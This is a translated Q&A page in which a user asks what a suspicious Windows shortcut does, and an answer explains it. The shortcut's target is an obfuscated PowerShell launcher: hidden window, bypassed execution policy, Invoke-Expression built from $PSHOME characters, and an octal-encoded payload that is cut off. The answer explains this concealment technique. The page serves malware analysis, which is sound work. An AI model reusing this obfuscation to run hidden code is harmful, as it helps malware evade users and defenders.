Powershell加入拼图

时间:2018-11-18 05:42:55

标签: powershell powershell-v3.0

有人知道以下powerhshell的作用吗?我发现了一个似乎是恶意的快捷方式,其目标是:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP  . ( $pshOmE[4]+$PShoMe[30]+'X') ( -JoiN( (44 ,141, 163,160 , 170 ,40 , 75, 40 , 50,50 ,116 , 145 ,167,55 , 117 , 142 , 152,145 , 143 , 164,40,123 ,171,163,164 , 145,155,56 ,116

1 个答案:

答案 0 :(得分:1)

再见我的其他answer。与其他answer相比,iex(= Invoke-Expression)是通过$PSHOME变量(= $pshOmE[4]+$PShoMe[30]+'X')构建的。 join命令中的数字可以包含扩展的ASCII字符,也可以是Base64编码的命令,可以通过powershell.exe -encodedCommand $encodedCommand(类型为powershell.exe /?的形式使用,并将转储一个例子)。

希望有帮助

相关问题
最新问题